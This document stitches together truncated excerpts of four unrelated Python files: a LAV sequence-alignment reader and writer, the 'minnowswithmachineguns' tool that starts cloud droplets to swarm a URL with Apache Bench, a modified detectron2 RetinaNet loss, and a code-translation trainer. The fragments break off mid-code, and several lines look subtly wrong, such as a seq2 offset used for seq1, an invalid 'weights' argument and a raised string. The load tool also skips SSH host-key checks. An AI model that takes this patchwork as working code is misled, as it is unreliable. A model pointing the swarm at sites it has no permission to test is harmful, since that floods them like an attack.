except: pctId = float(fields[5])
assert (length2 == length), "length mismatch in a-stanza"
pieces.append((start1+self.seq1_start,start2+self.seq2_start,length,pctId))
assert (line == "}"), "improper a-stanza terminator (line %d, \"%s\")" \
% (self.lineNumber,line)
return (score,pieces)
def parse_unknown_stanza(self):
lines = []
while (True):
line = self.fetch_line()
assert (line), "unexpected end of file (missing #:eof)"
if (line == "}"): break
lines.append(line)
return " " + "\n ".join(lines) + "\n"
def fetch_line(self,strip=True,requireLine=True,report=""):
if (strip == None): line = self.file.readline()
elif (strip == True): line = self.file.readline().strip()
else: line = self.file.readline().strip().strip(strip)
self.lineNumber += 1
if (requireLine):
assert (line), \
"unexpected blank line or end of file%s (line %d)" \
% (report,self.lineNumber)
return line
def d_stanza(self):
if (self.d_stanza_text == None): return ""
return "d {\n%s}" % self.d_stanza_text
def s_stanza(self):
if (self.seq1_filename == None): return ""
if (self.seq1_strand == "-"): seq1_strand = "1"
else: seq1_strand = "0"
if (self.seq2_strand == "-"): seq2_strand = "1"
else: seq2_strand = "0"
s = " \"%s\" %d %d %s %d\n"\
% (self.seq1_filename,self.seq2_start+1,self.seq1_end,
seq1_strand,self.seq1_contig)
s += " \"%s\" %d %d %s %d\n"\
% (self.seq2_filename,self.seq2_start+1,self.seq2_end,
seq2_strand,self.seq2_contig)
return "s {\n%s}" % s
def h_stanza(self):
if (self.seq1_header == None): return ""
s = " \"%s%s\"\n" % (self.seq1_header_prefix,self.seq1_header)
s += " \"%s%s\"\n" % (self.seq2_header_prefix,self.seq2_header)
return "h {\n%s}" % s
def build_alignment(self,score,pieces):
"""converts a score and pieces to an alignment"""
# build text
self.open_seqs()
text1 = text2 = ""
end1 = end2 = None
for (start1,start2,length,pctId) in pieces:
if (end1 != None):
if (start1 == end1): # insertion in sequence 2
text1 += self.seq1_gap * (start2-end2)
text2 += self.seq2_file.get(end2,start2-end2)
else: # insertion in sequence 1
text1 += self.seq1_file.get(end1,start1-end1)
text2 += self.seq2_gap * (start1-end1)
text1 += self.seq1_file.get(start1,length)
text2 += self.seq2_file.get(start2,length)
end1 = start1 + length
end2 = start2 + length
# create alignment
start1 = pieces[0][0]
start2 = pieces[0][1]
end1 = pieces[-1][0] + pieces[-1][2]
end2 = pieces[-1][1] + pieces[-1][2]
size1 = end1 - start1
size2 = end2 - start2
a = Alignment(score=score,species_to_lengths=self.species_to_lengths)
#if (self.seq1_strand == "-"): start1 = self.seq1_file.length - end1
a.add_component(Component(self.seq1_src,start1,size1,self.seq1_strand,text=text1))
#if (self.seq2_strand == "-"): start2 = self.seq2_file.length - end2
a.add_component(Component(self.seq2_src,start2,size2,self.seq2_strand,text=text2))
return a
def path_to_src_name(self,path_name):
# converts, e.g. ".../hg18/seq/chr13.nib" to "hg18.chr13"
if (path_name == None) or (path_name == ""): raise ValueError
if (path_name.endswith(".nib")): path_name = path_name[:-4]
if (path_name.endswith(".fa")): path_name = path_name[:-3]
if (path_name.endswith(".fasta")): path_name = path_name[:-6]
slash = path_name.rfind("/")
if (slash == -1): return path_name
name = path_name[slash+1:]
path_name = path_name[:slash]
if (path_name.endswith("/seq")): path_name = path_name[:-4]
slash = path_name.rfind("/")
if (slash != -1): path_name = path_name[slash+1:]
return path_name + "." + name
def header_to_src_name(self,header):
# converts, e.g. "hg18.chr13:115404472-117281897" to "hg18.chr13"
if (header == None) or (header == ""): raise ValueError
colon = header.rfind(":")
if (colon != -1): header = header[:colon]
if ("/" in header): raise ValueError
if (header.count(".") == 0):
return header
header = header.split(".")
if (header[0] == "") or (header[1] == ""): raise ValueError
return ".".join(header)
class ReaderIter(object):
def __init__(self,reader):
self.reader = reader
def __iter__(self):
return self
def next(self):
v = self.reader.next()
if (not v): raise StopIteration
return v
class LavAsPiecesReader(Reader):
"""Iterate over all lav blocks in a file in order, returning alignments
as score and pieces, as returned by Reader.parse_a_stanza"""
def build_alignment(self,score,pieces):
return (score,pieces)
class Writer(object):
# blockHash is a hash from (src1,strand1,src2,strand2) to a list of blocks;
# the blocks are collected on each call to write(), but the actual writing
# does not occur until close().
def __init__(self,file,attributes={}):
self.file = file
self.fname1 = None
self.fname2 = None
self.block = 0
self.blockHash = {} # (see note above)
if ("name_format_1" in attributes):
self.fname1 = attributes["name_format_1"]
if ("name_format_2" in attributes):
self.fname2 = attributes["name_format_2"]
if ("d_stanza" in attributes):
write_lav_marker(self)
print >>self.file,"d {"
print >>self.file,attributes["d_stanza"]
print >>self.file,"}"
def write(self,alignment):
if (len(alignment.components) != 2):
raise "%d-component alignment is not compatible with lav" % \
len(alignment.components)
c1 = alignment.components[0]
c2 = alignment.components[1]
key = (c1.src,c1.strand,c2.src,c2.strand)
if (key not in self.blockHash): self.blockHash[key] = []
self.blockHash[key].append(alignment)
self.block += 1
def close(self):
keys = [key for key in self.blockHash]
keys = sort_keys_by_chrom (keys)
for key in keys:
(src1,strand1,src2,strand2) = key
alignment = self.blockHash[key][0]
self.src1 = src1
self.strand1 = strand1
self.length1 = alignment.src_size(src1)
self.src2 = src2
self.strand2 = strand2
self.length2 = alignment.src_size(src2)
self.write_s_stanza()
self.write_h_stanza()
for alignment in self.blockHash[key]:
self.write_a_stanza(alignment)
self.write_trailer()
if (self.file != sys.stdout): self.file.close()
def write_s_stanza(self):
self.write_lav_marker()
(strand1,flag1) = minus_or_nothing(self.strand1)
(strand2,flag2) = minus_or_nothing(self.strand2)
fname1 = build_filename(self.fname1,self.src1)
fname2 = build_filename(self.fname2,self.src2)
print >>self.file,"s {"
print >>self.file," \"%s%s\" 1 %d %d 1" \
% (fname1,strand1,self.length1,flag1)
print >>self.file," \"%s%s\" 1 %d %d 1" \
% (fname2,strand2,self.length2,flag2)
print >>self.file,"}"
def write_h_stanza(self):
strand1 = rc_or_nothing(self.strand1)
strand2 = rc_or_nothing(self.strand2)
print >>self.file,"h {"
print >>self.file," \"> %s%s\"" % (self.src1,strand1)
print >>self.file," \"> %s%s\"" % (self.src2,strand2)
print >>self.file,"}"
def write_a_stanza(self,alignment):
c1 = alignment.components[0]
pos1 = c1.start
text1 = c1.text.upper()
c2 = alignment.components[1]
pos2 = c2.start
text2 = c2.text.upper()
# collect ungapped pieces
pieces = []
piece1 = None
for ix in range(len(text1)):
ch1 = text1[ix]
ch2 = text2[ix]
nonGap = (ch1 != "-") and (ch2 | |
<filename>minnowswithmachineguns/minnows.py
#!/bin/env python
"""
The MIT License
Copyright (c) 2010 The Chicago Tribune & Contributors
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from multiprocessing import Pool
import os
import json
import re
import socket
import time
import urllib2
import csv
import math
import random
from dop.client import Client
import paramiko
STATE_FILENAME = os.path.expanduser('~/.minnows')
# Utilities
def _read_server_list():
if not os.path.isfile(STATE_FILENAME):
return None, None, None, []
with open(STATE_FILENAME, 'r') as f:
server_state = json.loads(f.read())
return server_state['client_key'], server_state['api_key'], server_state['login'], server_state['droplets']
def _write_server_list(client_key, api_key, login, droplets):
with open(STATE_FILENAME, 'w') as f:
d = {
'client_key' : client_key,
'api_key' : api_key,
'login' : login,
'droplets' : [d.id for d in droplets]
}
f.write(json.dumps(d))
def _delete_server_list():
os.remove(STATE_FILENAME)
# Methods
def up(count, client_key, api_key, login, size = 66, region_id = 1, ssh_keys = None):
"""
Startup the load testing server.
"""
count = int(count)
client = Client(client_key, api_key)
print 'Attempting to call up %i minnows.' % count
if not ssh_keys:
ssh_keys = [str(k.id) for k in client.all_ssh_keys()]
droplet_ids = []
droplets = []
#25489 is ubuntu 12.04
for i in range(0, count):
droplet = client.create_droplet('minnow-%s' % i, size, 25489, region_id, ssh_keys)
droplet_ids.append(droplet.id)
print "Started droplets with ids: %s" % ','.join([str(i) for i in droplet_ids])
print "Waiting for minnows to wake up..."
for drop_id in droplet_ids:
droplet = client.show_droplet(drop_id)
while (not droplet.status == 'active') or droplet.ip_address == -1:
print '.'
time.sleep(4)
droplet = client.show_droplet(drop_id)
droplets.append(droplet)
print "Droplet id %s is ready" % drop_id
print "The school of minnows has been assembled."
_write_server_list(client_key, api_key, login, droplets)
print "Arming the minnows with Apache Bench..."
#TODO: Can't ssh into the servers for a bit...is there a better way to do this rather than
#sleeping for an arbitrary amount of time?
time.sleep(20)
params = []
for droplet in droplets:
params.append({
'droplet_id': droplet.id,
'ip_address': droplet.ip_address,
'login': login,
})
# Spin up processes for connecting to EC2 instances
pool = Pool(len(params))
pool.map(_install_apache_utils, params)
return
def status():
"""
Report the status of the load testing servers.
"""
client_key, api_key, login, droplet_ids = _read_server_list()
client = Client(client_key, api_key)
if len(droplet_ids) == 0:
print 'No minnows have been mobilized.'
return
print "Getting status of minnows"
for drop_id in droplet_ids:
droplet = client.show_droplet(drop_id)
print 'minnow %s: %s @ %s' % (droplet.id, droplet.status, droplet.ip_address)
def down():
"""
Shutdown the load testing server.
"""
client_key, api_key, login, droplet_ids = _read_server_list()
if not droplet_ids:
print 'No minnows have been mobilized.'
return
print 'Connecting to the ocean.'
client = Client(client_key, api_key)
for droplet_id in droplet_ids:
res = client.destroy_droplet(droplet_id)
print "Destroyed %s" % res
_delete_server_list()
def _install_apache_utils(params):
try:
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(
params['ip_address'],
username=params['login'])
stdin, stdout, stderr = client.exec_command('apt-get install apache2-utils -y')
stdout.read()
print "Armed minnow %s with Apache Bench" % params['droplet_id']
except socket.error, e:
return e
def _attack(params):
"""
Test the target URL with requests.
Intended for use with multiprocessing.
"""
print 'minnow %i is joining the school.' % params['i']
try:
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(
params['ip_address'],
username=params['login'])
print 'minnow %i is firing her machine gun. Bang bang!' % params['i']
options = ''
if params['headers'] is not '':
for h in params['headers'].split(';'):
options += ' -H "%s"' % h
stdin, stdout, stderr = client.exec_command('tempfile -s .csv')
params['csv_filename'] = stdout.read().strip()
if params['csv_filename']:
options += ' -e %(csv_filename)s' % params
else:
print 'minnow %i lost sight of the target (connection timed out creating csv_filename).' % params['i']
return None
if params['post_file']:
os.system("scp -q -o 'StrictHostKeyChecking=no' %s %s@%s:/tmp/honeycomb" % (params['post_file'], params['login'], params['ip_address']))
options += ' -k -T "%(mime_type)s; charset=UTF-8" -p /tmp/honeycomb' % params
params['options'] = options
benchmark_command = 'ab -r -n %(num_requests)s -c %(concurrent_requests)s -C "sessionid=NotARealSessionID" %(options)s "%(url)s"' % params
stdin, stdout, stderr = client.exec_command(benchmark_command)
response = {}
ab_results = stdout.read()
ms_per_request_search = re.search('Time\ per\ request:\s+([0-9.]+)\ \[ms\]\ \(mean\)', ab_results)
if not ms_per_request_search:
print 'minnow %i lost sight of the target (connection timed out running ab).' % params['i']
return None
requests_per_second_search = re.search('Requests\ per\ second:\s+([0-9.]+)\ \[#\/sec\]\ \(mean\)', ab_results)
failed_requests = re.search('Failed\ requests:\s+([0-9.]+)', ab_results)
complete_requests_search = re.search('Complete\ requests:\s+([0-9]+)', ab_results)
response['ms_per_request'] = float(ms_per_request_search.group(1))
response['requests_per_second'] = float(requests_per_second_search.group(1))
response['failed_requests'] = float(failed_requests.group(1))
response['complete_requests'] = float(complete_requests_search.group(1))
stdin, stdout, stderr = client.exec_command('cat %(csv_filename)s' % params)
response['request_time_cdf'] = []
for row in csv.DictReader(stdout):
row["Time in ms"] = float(row["Time in ms"])
response['request_time_cdf'].append(row)
if not response['request_time_cdf']:
print 'minnow %i lost sight of the target (connection timed out reading csv).' % params['i']
return None
print 'minnow %i is out of ammo.' % params['i']
client.close()
return response
except socket.error, e:
return e
def _print_results(results, params, csv_filename):
"""
Print summarized load-testing results.
"""
timeout_minnows = [r for r in results if r is None]
exception_minnows = [r for r in results if type(r) == socket.error]
complete_minnows = [r for r in results if r is not None and type(r) != socket.error]
timeout_minnows_params = [p for r,p in zip(results, params) if r is None]
exception_minnows_params = [p for r,p in zip(results, params) if type(r) == socket.error]
complete_minnows_params = [p for r,p in zip(results, params) if r is not None and type(r) != socket.error]
num_timeout_minnows = len(timeout_minnows)
num_exception_minnows = len(exception_minnows)
num_complete_minnows = len(complete_minnows)
if exception_minnows:
print ' %i of your minnows didn\'t make it to the action. They might be taking a little longer than normal to find their machine guns, or may have been terminated without using "minnows down".' % num_exception_minnows
if timeout_minnows:
print ' Target timed out without fully responding to %i minnows.' % num_timeout_minnows
if num_complete_minnows == 0:
print ' No minnows completed the mission. Apparently your minnows are peace-loving hippies.'
return
complete_results = [r['complete_requests'] for r in complete_minnows]
total_complete_requests = sum(complete_results)
print ' Complete requests:\t\t%i' % total_complete_requests
complete_results = [r['failed_requests'] for r in complete_minnows]
total_failed_requests = sum(complete_results)
print ' Failed requests:\t\t%i' % total_failed_requests
complete_results = [r['requests_per_second'] for r in complete_minnows]
mean_requests = sum(complete_results)
print ' Requests per second:\t%f [#/sec]' % mean_requests
complete_results = [r['ms_per_request'] for r in complete_minnows]
mean_response = sum(complete_results) / num_complete_minnows
print ' Time per request:\t\t%f [ms] (mean of minnows)' % mean_response
# Recalculate the global cdf based on the csv files collected from
# ab. Can do this by sampling the request_time_cdfs for each of
# the completed minnows in proportion to the number of
# complete_requests they have
n_final_sample = 100
sample_size = 100*n_final_sample
n_per_minnow = [int(r['complete_requests']/total_complete_requests*sample_size)
for r in complete_minnows]
sample_response_times = []
for n, r in zip(n_per_minnow, complete_minnows):
cdf = r['request_time_cdf']
for i in range(n):
j = int(random.random()*len(cdf))
sample_response_times.append(cdf[j]["Time in ms"])
sample_response_times.sort()
request_time_cdf = sample_response_times[0:sample_size:sample_size/n_final_sample]
print ' 50%% responses faster than:\t%f [ms]' % request_time_cdf[49]
print ' 90%% responses faster than:\t%f [ms]' % request_time_cdf[89]
if mean_response < 500:
print 'Mission Assessment: Target crushed minnow offensive.'
elif mean_response < 1000:
print 'Mission Assessment: Target successfully fended off the school.'
elif mean_response < 1500:
print 'Mission Assessment: Target wounded, but operational.'
elif mean_response < 2000:
print 'Mission Assessment: Target severely compromised.'
else:
print 'Mission Assessment: school annihilated target.'
if csv_filename:
with open(csv_filename, 'w') as stream:
writer = csv.writer(stream)
header = ["% faster than", "all minnows [ms]"]
for p in complete_minnows_params:
header.append("minnow %(droplet_id)s [ms]" % p)
writer.writerow(header)
for i in range(100):
row = [i, request_time_cdf[i]]
for r in results:
row.append(r['request_time_cdf'][i]["Time in ms"])
writer.writerow(row)
def attack(url, n, c, **options):
"""
Test the root url of this site.
"""
| |
<filename>detectron2/modeling/meta_arch/retinanet.py<gh_stars>1-10
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import logging
import math
import numpy as np
from typing import List
import torch
from fvcore.nn import giou_loss, sigmoid_focal_loss_jit, smooth_l1_loss
from torch import nn
from torch.nn import functional as F
from detectron2.data.detection_utils import convert_image_to_rgb
from detectron2.layers import ShapeSpec, batched_nms, cat, get_norm
from detectron2.structures import Boxes, ImageList, Instances, pairwise_iou
from detectron2.utils.events import get_event_storage
from ..anchor_generator import build_anchor_generator
from ..backbone import build_backbone
from ..box_regression import Box2BoxTransform
from ..matcher import Matcher
from ..postprocessing import detector_postprocess
from .build import META_ARCH_REGISTRY
__all__ = ["RetinaNet"]
def permute_to_N_HWA_K(tensor, K):
"""
Transpose/reshape a tensor from (N, (Ai x K), H, W) to (N, (HxWxAi), K)
"""
assert tensor.dim() == 4, tensor.shape
N, _, H, W = tensor.shape
tensor = tensor.view(N, -1, K, H, W)
tensor = tensor.permute(0, 3, 4, 1, 2)
tensor = tensor.reshape(N, -1, K) # Size=(N,HWA,K)
return tensor
def focal_loss(labels, logits, alpha, gamma):
"""Compute the focal loss between `logits` and the ground truth `labels`.
Focal loss = -alpha_t * (1-pt)^gamma * log(pt)
where pt is the probability of being classified to the true class.
pt = p (if true class), otherwise pt = 1 - p. p = sigmoid(logit).
Args:
labels: A float tensor of size [batch, num_classes].
logits: A float tensor of size [batch, num_classes].
alpha: A float tensor of size [batch_size]
specifying per-example weight for balanced cross entropy.
gamma: A float scalar modulating loss from hard and easy examples.
Returns:
focal_loss: A float32 scalar representing normalized total loss.
"""
BCLoss = F.binary_cross_entropy_with_logits(input=logits, target=labels, reduction="none")
if gamma == 0.0:
modulator = 1.0
else:
modulator = torch.exp(-gamma * labels * logits - gamma * torch.log(1 +
torch.exp(-1.0 * logits)))
loss = modulator * BCLoss
weighted_loss = alpha * loss
focal_loss = torch.sum(weighted_loss)
focal_loss /= torch.sum(labels)
return focal_loss
def CB_loss(labels, logits, samples_per_cls, no_of_classes, loss_type, beta, gamma):
"""Compute the Class Balanced Loss between `logits` and the ground truth `labels`.
Class Balanced Loss: ((1-beta)/(1-beta^n))*Loss(labels, logits)
where Loss is one of the standard losses used for Neural Networks.
Args:
labels: A int tensor of size [batch].
logits: A float tensor of size [batch, no_of_classes].
samples_per_cls: A python list of size [no_of_classes].
no_of_classes: total number of classes. int
loss_type: string. One of "sigmoid", "focal", "softmax".
beta: float. Hyperparameter for Class balanced loss.
gamma: float. Hyperparameter for Focal loss.
Returns:
cb_loss: A float tensor representing class balanced loss
"""
zero_class_index = samples_per_cls == 0
# print(zero_class_index)
samples_per_cls[zero_class_index] = 1
beta = (samples_per_cls - 1.0) / samples_per_cls.float()
effective_num = 1.0 - torch.pow(beta, samples_per_cls)
weights = (1.0 - beta) / effective_num
weights[zero_class_index] = 0
weights = weights / torch.sum(weights) * (no_of_classes - weights[zero_class_index].shape[0])
labels_one_hot = F.one_hot(labels, no_of_classes + 1).float()
# print("labels_one_hot:", labels_one_hot.shape)
# labels_one_hot = labels_one_hot[:, :-1]
# print("labels_one_hot:", labels_one_hot.shape)
weights = torch.tensor(weights).float()
weights = weights.unsqueeze(0)
# print(weights.shape)
# print(weights.repeat(labels_one_hot.shape[0], 1).shape)
weights = weights.repeat(labels_one_hot.shape[0], 1) * labels_one_hot
weights = weights.sum(1)
weights = weights.unsqueeze(1)
weights = weights.repeat(1, no_of_classes)
if loss_type == "focal":
cb_loss = focal_loss(labels_one_hot[:, :-1], logits, weights, gamma)
elif loss_type == "sigmoid":
cb_loss = F.binary_cross_entropy_with_logits(input=logits, target=labels_one_hot, weights=weights)
elif loss_type == "softmax":
pred = logits.softmax(dim=1)
cb_loss = F.binary_cross_entropy(input=pred, target=labels_one_hot, weight=weights)
return cb_loss
@META_ARCH_REGISTRY.register()
class RetinaNet(nn.Module):
"""
Implement RetinaNet in :paper:`RetinaNet`.
"""
def __init__(self, cfg):
super().__init__()
# fmt: off
self.num_classes = cfg.MODEL.RETINANET.NUM_CLASSES
self.in_features = cfg.MODEL.RETINANET.IN_FEATURES
# Loss parameters:
self.focal_loss_alpha = cfg.MODEL.RETINANET.FOCAL_LOSS_ALPHA
self.focal_loss_gamma = cfg.MODEL.RETINANET.FOCAL_LOSS_GAMMA
self.cb_loss_beta = cfg.MODEL.RETINANET.CB_LOSS_BETA
self.smooth_l1_loss_beta = cfg.MODEL.RETINANET.SMOOTH_L1_LOSS_BETA
self.box_reg_loss_type = cfg.MODEL.RETINANET.BBOX_REG_LOSS_TYPE
# Inference parameters:
self.score_threshold = cfg.MODEL.RETINANET.SCORE_THRESH_TEST
self.topk_candidates = cfg.MODEL.RETINANET.TOPK_CANDIDATES_TEST
self.nms_threshold = cfg.MODEL.RETINANET.NMS_THRESH_TEST
self.max_detections_per_image = cfg.TEST.DETECTIONS_PER_IMAGE
# Vis parameters
self.vis_period = cfg.VIS_PERIOD
self.input_format = cfg.INPUT.FORMAT
# fmt: on
self.backbone = build_backbone(cfg)
backbone_shape = self.backbone.output_shape()
feature_shapes = [backbone_shape[f] for f in self.in_features]
self.head = RetinaNetHead(cfg, feature_shapes)
self.anchor_generator = build_anchor_generator(cfg, feature_shapes)
# Matching and loss
self.box2box_transform = Box2BoxTransform(weights=cfg.MODEL.RETINANET.BBOX_REG_WEIGHTS)
self.anchor_matcher = Matcher(
cfg.MODEL.RETINANET.IOU_THRESHOLDS,
cfg.MODEL.RETINANET.IOU_LABELS,
allow_low_quality_matches=True,
)
self.register_buffer("pixel_mean", torch.Tensor(cfg.MODEL.PIXEL_MEAN).view(-1, 1, 1))
self.register_buffer("pixel_std", torch.Tensor(cfg.MODEL.PIXEL_STD).view(-1, 1, 1))
"""
In Detectron1, loss is normalized by number of foreground samples in the batch.
When batch size is 1 per GPU, #foreground has a large variance and
using it lead to lower performance. Here we maintain an EMA of #foreground to
stabilize the normalizer.
"""
self.loss_normalizer = 100 # initialize with any reasonable #fg that's not too small
self.loss_normalizer_momentum = 0.9
@property
def device(self):
return self.pixel_mean.device
def visualize_training(self, batched_inputs, results):
"""
A function used to visualize ground truth images and final network predictions.
It shows ground truth bounding boxes on the original image and up to 20
predicted object bounding boxes on the original image.
Args:
batched_inputs (list): a list that contains input to the model.
results (List[Instances]): a list of #images elements.
"""
from detectron2.utils.visualizer import Visualizer
assert len(batched_inputs) == len(
results
), "Cannot visualize inputs and results of different sizes"
storage = get_event_storage()
max_boxes = 20
image_index = 0 # only visualize a single image
img = batched_inputs[image_index]["image"]
img = convert_image_to_rgb(img.permute(1, 2, 0), self.input_format)
v_gt = Visualizer(img, None)
v_gt = v_gt.overlay_instances(boxes=batched_inputs[image_index]["instances"].gt_boxes)
anno_img = v_gt.get_image()
processed_results = detector_postprocess(results[image_index], img.shape[0], img.shape[1])
predicted_boxes = processed_results.pred_boxes.tensor.detach().cpu().numpy()
v_pred = Visualizer(img, None)
v_pred = v_pred.overlay_instances(boxes=predicted_boxes[0:max_boxes])
prop_img = v_pred.get_image()
vis_img = np.vstack((anno_img, prop_img))
vis_img = vis_img.transpose(2, 0, 1)
vis_name = f"Top: GT bounding boxes; Bottom: {max_boxes} Highest Scoring Results"
storage.put_image(vis_name, vis_img)
def forward(self, batched_inputs):
"""
Args:
batched_inputs: a list, batched outputs of :class:`DatasetMapper` .
Each item in the list contains the inputs for one image.
For now, each item in the list is a dict that contains:
* image: Tensor, image in (C, H, W) format.
* instances: Instances
Other information that's included in the original dicts, such as:
* "height", "width" (int): the output resolution of the model, used in inference.
See :meth:`postprocess` for details.
Returns:
dict[str: Tensor]:
mapping from a named loss to a tensor storing the loss. Used during training only.
"""
images = self.preprocess_image(batched_inputs)
features = self.backbone(images.tensor)
features = [features[f] for f in self.in_features]
anchors = self.anchor_generator(features)
pred_logits, pred_anchor_deltas = self.head(features)
# Transpose the Hi*Wi*A dimension to the middle:
pred_logits = [permute_to_N_HWA_K(x, self.num_classes) for x in pred_logits]
pred_anchor_deltas = [permute_to_N_HWA_K(x, 4) for x in pred_anchor_deltas]
if self.training:
assert "instances" in batched_inputs[0], "Instance annotations are missing in training!"
gt_instances = [x["instances"].to(self.device) for x in batched_inputs]
gt_labels, gt_boxes = self.label_anchors(anchors, gt_instances)
losses = self.losses(anchors, pred_logits, gt_labels, pred_anchor_deltas, gt_boxes)
if self.vis_period > 0:
storage = get_event_storage()
if storage.iter % self.vis_period == 0:
results = self.inference(
anchors, pred_logits, pred_anchor_deltas, images.image_sizes
)
self.visualize_training(batched_inputs, results)
return losses
else:
results = self.inference(anchors, pred_logits, pred_anchor_deltas, images.image_sizes)
processed_results = []
for results_per_image, input_per_image, image_size in zip(
results, batched_inputs, images.image_sizes
):
height = input_per_image.get("height", image_size[0])
width = input_per_image.get("width", image_size[1])
r = detector_postprocess(results_per_image, height, width)
processed_results.append({"instances": r})
return processed_results
def losses(self, anchors, pred_logits, gt_labels, pred_anchor_deltas, gt_boxes):
"""
Args:
anchors (list[Boxes]): a list of #feature level Boxes
gt_labels, gt_boxes: see output of :meth:`RetinaNet.label_anchors`.
Their shapes are (N, R) and (N, R, 4), respectively, where R is
the total number of anchors across levels, i.e. sum(Hi x Wi x Ai)
pred_logits, pred_anchor_deltas: both are list[Tensor]. Each element in the
list corresponds to one level and has shape (N, Hi * Wi * Ai, K or 4).
Where K is the number of classes used in `pred_logits`.
Returns:
dict[str, Tensor]:
mapping from a named loss to a scalar tensor
storing the loss. Used during training only. The dict keys are:
"loss_cls" and "loss_box_reg"
"""
num_images = len(gt_labels)
gt_labels = torch.stack(gt_labels) # (N, R)
anchors = type(anchors[0]).cat(anchors).tensor # (R, 4)
gt_anchor_deltas = [self.box2box_transform.get_deltas(anchors, k) for k in gt_boxes]
gt_anchor_deltas = torch.stack(gt_anchor_deltas) # (N, R, 4)
valid_mask = gt_labels >= 0
pos_mask = (gt_labels >= 0) & (gt_labels != self.num_classes)
num_pos_anchors = pos_mask.sum().item()
get_event_storage().put_scalar("num_pos_anchors", num_pos_anchors / num_images)
self.loss_normalizer = self.loss_normalizer_momentum * self.loss_normalizer + (
1 - self.loss_normalizer_momentum
) * max(num_pos_anchors, 1)
# classification and regression loss
"""gt_labels_target = F.one_hot(gt_labels[valid_mask], num_classes=self.num_classes + 1)[
:, :-1
] # no loss for the last (background) class
loss_cls = sigmoid_focal_loss_jit(
cat(pred_logits, dim=1)[valid_mask],
gt_labels_target.to(pred_logits[0].dtype),
alpha=self.focal_loss_alpha,
gamma=self.focal_loss_gamma,
reduction="sum",
)"""
gt_labels_target = gt_labels[valid_mask]
# gt_labels_target = gt_labels_target_[gt_labels_target_ != 10]
pred_logits = cat(pred_logits, dim=1)[valid_mask]
# pred_logits = pred_logits[gt_labels_target_ != 10]
unique_labels, count = torch.unique(gt_labels_target, return_counts=True)
samples_per_cls = torch.zeros(self.num_classes + 1, dtype=torch.int64).cuda()
| |
# Copyright (c) 2019-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
import math
import os
import random
import time
from collections import OrderedDict
from concurrent.futures.process import ProcessPoolExecutor
from logging import getLogger
import apex
import numpy as np
import torch
from torch.nn.utils import clip_grad_norm_
from .cache import ListCache, RoundRobinCache
from .data.loader import SELF_TRAINED
from .model.CustomDDP import CustomTorchDDP, CustomApexDDP
from .optim import get_optimizer
from .utils import (
parse_lambda_config,
update_lambdas,
convert_to_text,
add_noise,
safe_index,
restore_segmentation_sentence,
get_programming_language_name,
)
from .utils import to_cuda, concat_batches, batch_sentences, show_batch
import sys
from pathlib import Path
sys.path.append(str(Path(__file__).parents[3]))
print("adding to path", str(Path(__file__).parents[3]))
from codegen_sources.test_generation.test_runners.python_test_runner import (
PythonTestRunner,
)
from codegen_sources.test_generation.test_runners.cpp_test_runner import CppTestRunner
logger = getLogger()
class Trainer(object):
def __init__(self, data, params, model_names):
"""
Initialize trainer.
"""
# epoch / iteration size
self.params = params
self.data = data
self.MODEL_NAMES = model_names
self.epoch_size = params.epoch_size
if self.epoch_size == -1:
self.epoch_size = len(self.data)
assert self.epoch_size > 0
# data iterators
self.iterators = {}
# set parameters
self.set_parameters()
# float16 / distributed (no AMP)
assert params.amp >= 1 or not params.fp16
assert params.amp >= 0 or params.accumulate_gradients == 1
if params.multi_gpu and params.amp == -1:
logger.info("Using nn.parallel.DistributedDataParallel ...")
for name in self.MODEL_NAMES:
model_attr = getattr(self, name)
if isinstance(model_attr, list):
setattr(
self,
name,
[
CustomTorchDDP(
model,
device_ids=[params.local_rank],
output_device=params.local_rank,
broadcast_buffers=True,
)
for model in model_attr
],
)
else:
setattr(
self,
name,
CustomTorchDDP(
model_attr,
device_ids=[params.local_rank],
output_device=params.local_rank,
broadcast_buffers=True,
),
)
# set optimizers
self.set_optimizers()
# float16 / distributed (AMP)
if params.amp >= 0:
self.init_amp()
if params.multi_gpu:
logger.info("Using apex.parallel.DistributedDataParallel ...")
for name in self.MODEL_NAMES:
model_attr = getattr(self, name)
if isinstance(model_attr, list):
setattr(
self,
name,
[
CustomApexDDP(model, delay_allreduce=True)
for model in model_attr
],
)
else:
setattr(
self, name, CustomApexDDP(model_attr, delay_allreduce=True),
)
# stopping criterion used for early stopping
if params.stopping_criterion != "":
split = params.stopping_criterion.split(",")
assert len(split) == 2 and split[1].isdigit()
self.decrease_counts_max = int(split[1])
self.decrease_counts = 0
if split[0][0] == "_":
self.stopping_criterion = (split[0][1:], False)
else:
self.stopping_criterion = (split[0], True)
self.best_stopping_criterion = -1e12 if self.stopping_criterion[1] else 1e12
else:
self.stopping_criterion = None
self.best_stopping_criterion = None
if len(params.st_steps) > 0:
self.test_runners = {
"python": PythonTestRunner(timeout=params.st_test_timeout),
"cpp": CppTestRunner(timeout=params.st_test_timeout),
}
self.unit_tests = data[f"java_st_unit_tests"]
# probability of masking out / randomize / not modify words to predict
params.pred_probs = torch.FloatTensor(
[params.word_mask, params.word_keep, params.word_rand]
)
# probabilty to predict a word
counts = np.array(list(self.data["dico"].counts.values()))
params.mask_scores = np.maximum(counts, 1) ** -params.sample_alpha
params.mask_scores[params.pad_index] = 0 # do not predict <PAD> index
# do not predict special tokens
params.mask_scores[counts == 0] = 0
# validation metrics
self.metrics = []
metrics = [m for m in params.validation_metrics.split(",") if m != ""]
